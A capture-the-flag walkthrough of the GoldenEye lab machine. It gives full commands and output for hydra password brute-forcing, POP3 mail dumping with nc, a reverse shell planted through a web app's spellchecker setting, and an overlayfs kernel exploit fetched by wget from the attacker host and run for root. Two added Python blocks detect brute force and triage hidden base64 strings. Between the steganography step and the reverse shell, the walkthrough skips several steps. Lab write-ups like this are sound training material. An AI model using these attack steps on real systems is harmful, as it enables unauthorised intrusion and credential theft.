This is an OSCP-style vulnerable machine themed after the great James Bond film (and even better N64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes in flag.txt. It is an Intermediate machine and needs a good variety of techniques to get root, with no exploit development or buffer overflows.
1. Reconnaissance
Scanning the network to find the vulnerable machine's IP
We find the IP of the vulnerable machine to be 192.168.10.26
2. Scanning
2.1 Nmap
Using nmap to find the open ports and their services
nmap -Pn -p- -A 192.168.10.26
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-20 09:48 IST
Nmap scan report for 192.168.10.26
Host is up (0.0022s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: GoldenEye Primary Admin Server
|_http-server-header: Apache/2.4.7 (Ubuntu)
55006/tcp open ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: USER CAPA UIDL RESP-CODES SASL(PLAIN) TOP STLS PIPELINING AUTH-RESP-CODE
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:3C:E6:8B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 2.24 ms 192.168.10.26
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.20 seconds
We find TCP ports 25, 80, 55006 and 55007 open, with SMTP, an Apache web server, a Dovecot mail server and POP3 running respectively.
Web server
Browsing over to the webpage
Here we are greeted with a super cool home page with a login path /sev-home provided for user login.
Viewing the source code of this page, we can see that a JavaScript file terminal.js is referenced. Seems interesting.
Navigating to terminal.js, we find a message to Boris in the comments.
We get two potential usernames, Boris and Natalya, and a URL-encoded password.
Decoding the password:
InvincibleHack3r
/sev-home
Navigating to /sev-home, we get a login page
Using the credentials boris : InvincibleHack3r, we can log in to the page.
We can see an ode to the James Bond movie GoldenEye and a reference to their pop3 servers. This might be a hint.
2.2 Brute-forcing pop3 (Natalya)
We can use hydra to brute-force natalya's pop3 password using the word list /usr/share/wordlists/fasttrack.txt
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt pop3://192.168.10.26:55007
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-20 10:17:17
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.10.26:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.10.26 login: natalya password: bird
[STATUS] 111.00 tries/min, 222 tries in 00:02h, 1 to do in 00:01h, 15 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-20 10:19:17
We get the credentials:
natalya : bird
2.3 Dumping mails via pop3 (Natalya)
We can use nc to access the pop3 server and log in with the credentials, then use the list command to show all the mails.
nc 192.168.10.26 55007
+OK GoldenEye POP3 Electronic-Mail System
user natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
There are two mails sent to Natalya
Retrieving the 1st message
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
Nothing much of interest there, other than the mention of Boris' weak credentials.
Retrieving the 2nd message
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is its related to security...even if its not, just enter it in under the guise of "security"...itll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didnt have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since youre a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
Here we get another set of credentials, for their internal domain severnaya-station.com/gnocertdir:
xenia : RCP90rulez!
Adding severnaya-station.com to our /etc/hosts file as specified.
Accessing http://severnaya-station.com/gnocertdir/login/index.php and logging in using the above credentials.
Navigating to the message folder
Navigation > Home > My profile > Messages > Recent conversations
We find a message from another potential user, doak
2.4 Brute-forcing pop3 (Doak)
Using hydra to brute-force doak's pop3 password using the word list /usr/share/wordlists/fasttrack.txt
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.10.26 -s 55007
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-20 10:35:08
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task
[DATA] attacking pop3://192.168.10.26:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active
[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active
[55007][pop3] host: 192.168.10.26 login: doak password: goat
[STATUS] attack finished for 192.168.10.26 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-20 10:37:25
We get the credentials:
doak : goat
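Both hydra runs above (2.2 and 2.4) hit Dovecot with roughly 80 login attempts a minute from one source, which is exactly the pattern the mail server's own logs expose to a defender. The following detection logic is an added example, not part of the original walkthrough: it parses Dovecot-style pop3-login messages and alerts on a failure burst and on a successful login that follows one. The log lines are constructed to match the Dovecot 2.x message shape, not captured from the machine.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Dovecot 2.x pop3-login message shape (the constructed sample below follows it)
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>, "
    r"method=\w+, rip=(?P<rip>[\d.]+)"
)

def parse(line: str, year: int = 2022):
    """Return (timestamp, success, user, source_ip) or None for unrelated lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["event"] == "Login", m["user"], m["rip"]

def detect_pop3_bruteforce(lines, threshold: int = 10, window_s: int = 60):
    """Alerts as (kind, source_ip, user, count).
    'burst': >= threshold failures from one source IP inside a sliding window_s.
    'success-after-bruteforce': a Login from a source that already failed >= threshold
    times; the high-fidelity signal that a password was actually found."""
    recent = defaultdict(deque)   # rip -> failure timestamps still inside the window
    total_failed = defaultdict(int)
    alerted, alerts = set(), []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, ok, user, rip = rec
        if ok:
            if total_failed[rip] >= threshold:
                alerts.append(("success-after-bruteforce", rip, user, total_failed[rip]))
            continue
        q = recent[rip]
        q.append(ts)
        total_failed[rip] += 1
        while (ts - q[0]).total_seconds() > window_s:   # q holds ts itself, so it never empties
            q.popleft()
        if len(q) >= threshold and rip not in alerted:
            alerted.add(rip)
            alerts.append(("burst", rip, user, len(q)))
    return alerts

def constructed_sample():
    """Constructed log, not from the machine: 12 failures in 12 seconds against natalya
    from 192.168.10.25, then a hit, then one unrelated failure from another host."""
    fail = ("Apr 20 10:17:{:02d} ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): "
            "user=<natalya>, method=PLAIN, rip=192.168.10.25, lip=192.168.10.26, session=<s{}>")
    lines = [fail.format(17 + i, i) for i in range(12)]
    lines.append("Apr 20 10:17:30 ubuntu dovecot: pop3-login: Login: user=<natalya>, method=PLAIN, "
                 "rip=192.168.10.25, lip=192.168.10.26, mpid=4242, session=<s99>")
    lines.append("Apr 20 10:18:01 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 5 secs): "
                 "user=<boris>, method=PLAIN, rip=10.0.0.7, lip=192.168.10.26, session=<z1>")
    return lines
```

Feeding the same logic with Dovecot's auth_verbose output in production would have flagged both hydra runs on the first minute and again on the successful bird/goat logins.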
2.5 Dumping mails via pop3 (Doak)
We can again use nc to access the pop3 server and log in with the credentials, then use the list command to show all the mails.
nc 192.168.10.26 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
There is one mail. Retrieving it:
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If youre reading this, congrats youve gotten this far. You know how tradecraft works right?
Because I dont. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
We get doak's login credentials:
dr_doak : 4England!
Logging in as dr_doak
Navigating to private files
Navigation > Home > My profile > My private files
There is a s3cret.txt for James
Viewing s3cret.txt
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
From the message, we can conclude that the sender was able to capture the admin credentials over clear text.
We are also given another location, where we find an image file. Maybe the credentials are hidden in it?
2.6 Reading hidden data from image
Downloading the image using wget
wget http://192.168.10.26/dir007key/for-007.jpg
--2022-04-20 10:47:23-- http://192.168.10.26/dir007key/for-007.jpg
Connecting to 192.168.10.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’
for-007.jpg 100%[=============================================================================>] 14.55K --.-KB/s in 0s
2022-04-20 10:47:23 (353 MB/s) - ‘for-007.jpg’ saved [14896/14896]
Steganography is the practice of concealing a message within another message or a physical object.
We can use strings to look for any readable data embedded in the image.
strings for-007.jpg
JFIF
Exif
eFdpbnRlcjE5OTV4IQ==
GoldenEye
linux
For James
0231
0100
ASCII
For 007
""""""""""
! !!! !!!!!!!!"""""""""""""""
-------------------------------------------------------------------
We find a base64 encoded string in the file eFdpbnRlcjE5OTV4IQ==
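The strings pass above is done by eye; the following script, an added example that is not part of the original walkthrough, automates the same triage: it pulls printable runs out of a binary the way strings does and keeps only those that are well-formed base64 and decode to readable text, which is what makes a token like the one above stand out from JPEG noise. The bytes it scans are constructed to mimic the file's layout, not the real for-007.jpg.

```python
import base64
import re
import string

# Printable ASCII minus control whitespace: what `strings` treats as text
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
B64_RE = re.compile(rb"^[A-Za-z0-9+/]{8,}={0,2}$")

def extract_strings(data: bytes, min_len: int = 4):
    """Equivalent of `strings -n 4`: runs of >= min_len printable bytes."""
    out, run = [], bytearray()
    for b in data + b"\x00":          # trailing sentinel flushes the final run
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(bytes(run))
        run = bytearray()
    return out

def base64_candidates(strs):
    """Return (token, decoded) pairs for strings that are well-formed base64
    (alphabet, length multiple of 4, padding) AND decode to printable text."""
    found = []
    for s in strs:
        if len(s) % 4 or not B64_RE.match(s):
            continue
        try:
            dec = base64.b64decode(s, validate=True)
        except ValueError:            # binascii.Error is a ValueError
            continue
        if dec and all(c in PRINTABLE for c in dec):
            found.append((s.decode(), dec.decode()))
    return found

def scan(data: bytes):
    """strings + base64 triage in one call, as done by hand in the walkthrough."""
    return base64_candidates(extract_strings(data))

# Constructed stand-in for for-007.jpg (not the real file): JPEG SOI/APP0 header,
# an APP1 segment carrying a base64 token next to a label, a COM segment and a
# decoy token (valid base64, but decodes to NUL bytes) that must be filtered out.
HIDDEN = base64.b64encode(b"constructed hidden note")
SAMPLE_JPEG = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    b"\xff\xe1\x00\x08Exif\x00\x00" + HIDDEN + b"\x00GoldenEye\x00"
    b"\xff\xfe\x00\x0cFor James\x00AAAAAAAAAAAA\x00\x12\x34\xff\xd9"
)

if __name__ == "__main__":
    for token, text in scan(SAMPLE_JPEG):
        print(f"{token} -> {text!r}")
```

Run against the real image the same filter keeps the token found above and drops JFIF, Exif and the other fragments, so the check can be folded into an automated triage of uploaded files.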
Pasting our reverse shell code into the Path to a spell field (make sure to change the IP and port) and saving it.
Navigating to Site blogs and adding a new entry
Home > Site pages > Site blogs
Starting an nc listener to capture our reverse connection
nc -lvnp 1234
listening on [any] 1234 ...
Entering some random text in the Blog entry body field and using the spellcheck functionality to trigger our reverse shell script.
Stabilizing the shell
nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.10.25] from (UNKNOWN) [192.168.10.26] 39488
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
4. Privilege Escalation
4.1 Kernel Exploit
Checking the version of the kernel using uname -a
www-data@ubuntu:/$ uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
We see that the system is running an outdated kernel.
Searching for potential exploits
searchsploit Linux ubuntu 3.13.0-32
------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------ ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Loc | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Loc | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write ( | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege E | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege E | linux/local/41760.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
We find an overlayfs privilege escalation exploit, 37292.
Copying it over to our current directory:
searchsploit -m 37292
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /opt/exploitdb/exploits/linux/local/37292.c
File Type: C source, ASCII text, with very long lines
Copied to: ~/goldeneye/37292.c
Checking for a compiler on the target system that can build our exploit
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ which gcc
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ which cc
/usr/bin/cc
We find that the target does not have gcc; instead it has cc.
So we need to edit the exploit's source code and change gcc to cc (line 143) for it to work on the target. (Even though we compile the exploit on our own machine and then send the binary to the target, the exploit itself invokes the compiler at runtime to build its shared library, so it fails if that compiler is not present.)
Compiling the file to a binary named exploit and hosting it with Python's HTTP server
cc 37292.c -o exploit
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Downloading the exploit into /tmp on the target, making it executable and running it.
www-data@ubuntu:/$ cd /tmp
www-data@ubuntu:/tmp$ wget http://192.168.10.25:8000/exploit
--2022-04-19 22:52:38-- http://192.168.10.25:8000/exploit
Connecting to 192.168.10.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21064 (21K) [application/octet-stream]
Saving to: 'exploit'
100%[======================================>] 21,064 --.-K/s in 0.02s
2022-04-19 22:52:38 (1.07 MB/s) - 'exploit' saved [21064/21064]
www-data@ubuntu:/tmp$ chmod +x exploit
www-data@ubuntu:/tmp$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
whoami
root
We are root
Viewing the flag, which is hidden in the /root directory:
cd /root
ls -la
total 44
drwx------ 3 root root 4096 Apr 29 2018 .
drwxr-xr-x 22 root root 4096 Apr 24 2018 ..
-rw-r--r-- 1 root root 19 May 3 2018 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 2018 .cache
-rw------- 1 root root 144 Apr 29 2018 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 2018 .rnd
-rw------- 1 root root 8296 Apr 29 2018 .viminfo
cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/